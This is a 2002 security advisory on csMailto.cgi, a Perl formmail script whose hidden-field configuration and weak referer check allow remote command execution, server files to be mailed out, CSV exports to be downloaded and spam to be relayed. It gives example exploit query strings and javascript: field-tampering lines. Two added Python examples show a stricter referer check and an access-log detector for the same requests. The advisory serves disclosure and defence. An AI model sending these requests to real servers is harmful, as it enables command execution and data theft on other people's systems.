[NEWS] csMailto.cgi - Remote Command Execution
From: support@securiteam.com
Date: 04/26/02
From: support@securiteam.com To: list@securiteam.com Date: Fri, 26 Apr 2002 08:53:16 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SUMMARY
<http://www.cgiscript.net/> csMailto is a Perl CGI Formmail script
developed by Mike Barone and Andy Angrick of CGIscript.net. From the
website "(csMailto is) an automated script that allows the user to build
and manage multiple mailto forms to use within your web site. Build your
own mailto forms without having to learn Perl. It also can send and
receive files!".
The script stores all its configuration data in hidden form fields,
relying on the user to accurately (and honestly) echo that information
back with each form submission. The only thing preventing a user from having
complete control over the script is a "referer" check that is easily
bypassed.
Because of this and other problems, the script is subject to the following
attacks:
- Execute commands on server.
- Execute command on server and mail output to anyone.
- Email server files to anyone.
- Downloading of logged form input (in CSV format).
- Use of form to send email to anyone.
DETAILS
Because the script stores all the form configuration data in hidden fields
in the actual form, once a user can bypass the referrer check they can
essentially do anything an administrator of the program could do, plus
some additional things that probably were not intended.
The script does not even check for the full referrer; it only checks for
the presence of the server hostname in the referrer you send. For
example, if the script is http://host.com/cgi-script/CSMailto/CSMailto.cgi
then it will look for "host.com" in the "referer".
This method is inherently insecure and can be bypassed by:
- Creating a perl LWP script which could specify an arbitrary referrer.
- Using JavaScript or other means to modify the form values on the
generated CSMailto form and allowing the browser to send the original (and
valid) URL as a referrer.
- Creating a local form page with the target hostname in the path and
thus in the referrer that is sent when the form is submitted (e.g.
C:\html\host.com\form.html)
- Creating a local html page with a simple link (see below) and the
target hostname in the path and thus in the referrer that is sent when the
link is clicked (e.g. C:\html\host.com.html)
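To make the weakness of the substring check concrete, here is an added example (not code from the advisory or from CGIscript.net) that runs the check described above beside a parsed, exact-host comparison over the Referer values the bypass list implies. The hostname "host.com" and the sample Referer strings are taken from or constructed after the advisory's examples; note that even the strict check only defeats the local-file tricks, since a scripted client sets the header itself, so the real fix is to keep configuration out of user-controlled fields.

```python
from urllib.parse import urlsplit

SCRIPT_HOST = "host.com"  # hostname the script is served from (the advisory's example)


def weak_referer_check(referer: str) -> bool:
    """Mimics the csMailto check described above: the hostname may appear
    anywhere in the Referer string, so path and file-name tricks pass."""
    return SCRIPT_HOST in referer


def strict_referer_check(referer: str) -> bool:
    """Parse the Referer as a URL and require an exact http(s) host match.
    Defeats the local-file bypasses, but not a client that forges the header."""
    try:
        parts = urlsplit(referer)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and (parts.hostname or "").lower() == SCRIPT_HOST


# Constructed sample Referer values: the legitimate form page plus the
# bypass variants the advisory lists. Value = should the check accept it?
SAMPLE_REFERERS = {
    "http://host.com/forms/contact.html": True,       # real form page on the server
    "file:///C:/html/host.com/form.html": False,       # local file, hostname in the path
    "file:///C:/html/host.com.html": False,            # local file, hostname in the file name
    "http://evil.example/host.com/form.html": False,   # hostname in the path of another site
    "http://host.com.evil.example/form.html": False,   # hostname as a prefix of another host
}


def false_accepts(checker) -> list:
    """Referers the checker accepts although they are not the real form page."""
    return [r for r, expected in SAMPLE_REFERERS.items() if checker(r) and not expected]


if __name__ == "__main__":
    print("substring check wrongly accepts:", false_accepts(weak_referer_check))
    print("exact-host check wrongly accepts:", false_accepts(strict_referer_check))
```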
Some example exploits are as follows. Note, these all assume that the
referrer check was bypassed with one of the above methods.
- Execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- Execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&
Email=user@host.com&
form-autoresponse=YES&command=mailform
- Email server file to anyone
CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&
form-autoresponse=YES&command=mailform
- Download/access form input (no "referer" check)
CSMailto has the option to "have the feedback exported to an external
file". These files are stored in CSV format and can be downloaded from:
CSMailto/export/FORM_NAME.csv
Form HTML files are often named after their form names and the information
is also stored in hidden fields in the actual form like so
"...formname=FORM_NAME...". Also, it's worth noting that the script
doesn't properly escape '"', ',', or nextline ("\n") chars, so any CSV
data with those characters may become corrupted.
- Use form to send email to anyone
CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&
form-results=body&command=mailform
As another example of the seriousness of this problem, as mentioned above,
you can simply load an existing CSMailto form, have your browser (IE in
this example) change some of the preset hidden form values, and then click
submit. Example:
- Email server file to anyone
javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
javascript:alert(document.forms[0]["Email"].value="user@host.com");
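For administrators who cannot remove the script immediately, the request patterns above are easy to spot in web server logs. The following is an added example (not part of the advisory and not CGIscript.net code) that classifies access-log request lines into the attack classes listed above; the log lines are constructed, using the advisory's own placeholder values, and the log format is assumed to be NCSA common/combined.

```python
import re
from urllib.parse import urlsplit, parse_qs

# NCSA common/combined log prefix; only the client IP and request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')


def classify_request(target: str) -> list:
    """Map one request path+query to the advisory's attack classes (empty list = nothing matched)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    findings = []
    # Direct download of the exported feedback log, which has no referer check at all.
    if re.search(r"/csmailto/export/[^/]+\.csv$", path):
        findings.append("csv-export-download")
    if path.endswith("/csmailto.cgi"):
        q = parse_qs(parts.query, keep_blank_values=True)  # decodes %7C back to "|"
        attachment = q.get("form-attachment", [""])[0]
        if "|" in attachment:                      # pipe in the attachment name: command execution
            findings.append("command-execution")
        elif attachment and q.get("form-autoresponse", [""])[0].upper() == "YES":
            findings.append("file-disclosure")     # a server file is mailed to the Email address
        if "form-to" in q:                         # recipient overridden from the query string
            findings.append("mail-relay")
    return findings


def scan_log(lines) -> list:
    """Return (client ip, request target, findings) for every line that matches a class."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings = classify_request(m["target"])
            if findings:
                hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample access-log lines; the placeholder values are the advisory's own.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Apr/2002:08:53:16 +0200] "GET /cgi-script/CSMailto/CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE%7C&command=mailform HTTP/1.0" 200 512
203.0.113.5 - - [26/Apr/2002:08:54:01 +0200] "GET /cgi-script/CSMailto/CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform HTTP/1.0" 200 512
198.51.100.7 - - [26/Apr/2002:09:00:00 +0200] "GET /cgi-script/CSMailto/export/FORM_NAME.csv HTTP/1.0" 200 2048
198.51.100.7 - - [26/Apr/2002:09:01:00 +0200] "GET /cgi-script/CSMailto/CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&form-results=body&command=mailform HTTP/1.0" 200 512
192.0.2.9 - - [26/Apr/2002:09:02:00 +0200] "POST /cgi-script/CSMailto/CSMailto.cgi HTTP/1.0" 200 512
""".splitlines()

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, target)
```

Only parameters sent in the query string reach the access log; a legitimate form is submitted by POST, whose body is not logged, so inspecting POST bodies needs a web application firewall or request logging module rather than this script.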
Impact:
Because of the high number of users who are using CGIscript.net scripts
(over 17,000 csSearch users alone according to the website) and the fact
that search engines can easily be used to identify sites with the unique
"csMailto.cgi" script name, the risk posed by these flaws is very high
indeed.
Solution:
Vendor was notified on Apr 5, 2002 of the problem but has not yet released
a fix.
Affected parties may want to consider switching to a free replacement such
as "nms formmail" which can be found at
<http://nms-cgi.sourceforge.net/scripts.shtml>
ADDITIONAL INFORMATION
The information has been provided by <mailto:stegus1@yahoo.com> Steve
Gustin.